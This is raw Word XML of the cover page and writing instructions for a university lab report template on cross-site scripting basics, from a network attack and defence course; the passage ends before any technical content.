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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>哈尔滨工业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>大学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计算机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>学院</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>《网络攻击与防御》</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId5" w:type="first"/>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:headerReference r:id="rId4" w:type="even"/>
          <w:footerReference r:id="rId6" w:type="even"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1797" w:bottom="1440" w:left="1797" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="lines" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2060" o:spid="_x0000_s2060" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:72pt;margin-top:421.2pt;height:70.2pt;width:287.95pt;z-index:251657216;mso-width-relative:page;mso-height-relative:page;" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill focussize="0,0"/>
            <v:stroke on="f" joinstyle="miter"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit"/>
            <v:textbox>
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>计算机科学与技术学院</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <w:t>计算机系网络教研室制</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2057" o:spid="_x0000_s2057" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:81pt;margin-top:148.2pt;height:265.2pt;width:261pt;z-index:251656192;mso-width-relative:page;mso-height-relative:page;" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill focussize="0,0"/>
            <v:stroke on="f" joinstyle="miter"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit"/>
            <v:textbox>
              <w:txbxContent>
                <w:tbl>
                  <w:tblPr>
                    <w:tblStyle w:val="11"/>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
                  <w:tblGrid>
                    <w:gridCol w:w="1620"/>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课程名称：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="nil"/>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>信息安全概论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实验名称：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="nil"/>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>跨站脚本攻击基础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指导教师：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>刘亚维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学生姓名：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>徐孟芸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组   号：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"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实验日期：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:left w:val="nil"/>
                          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                          </w:rPr>
                          <w:t>2019.06.08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实验地点：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:left w:val="nil"/>
                          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"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distribute"/>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>实验成绩：</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3528" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
                          <w:left w:val="nil"/>
                          <w:right w:val="nil"/>
                        </w:tcBorders>
                        <w:vAlign w:val="bottom"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p>
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>实验报告撰写要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验报告模板为电子版。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载统一的实验报告模板，学生自行完成撰写和打印。报告的首页包含本次实验的一般信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>号：例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2-5      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示第二班第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>组。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验日期：例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">05-10-06 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示本次实验日期。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验编号：例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">No.1     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示第一个实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验时间：例如：2学时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示本次实验所用的时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。续页不再需要包含首页中的实验一般信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实验报告正文部分具体要求如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId7" w:type="even"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1797" w:bottom="1440" w:left="1797" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="lines" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2064" o:spid="_x0000_s2064" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:0pt;margin-top:15.6pt;height:335.4pt;width:418.65pt;z-index:251658240;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600">
            <v:path/>
            <v:fill focussize="0,0"/>
            <v:stroke joinstyle="miter"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit"/>
            <v:shadow on="t"/>
            <v:textbox>
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>一、实验目的</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>本次实验所涉及并要求掌握的知识点。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>二、</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>实验环境</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>实验所使用的设备名称及规格，网络管理工具简介、版本等。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>三、</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>实验内容与实验要求</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
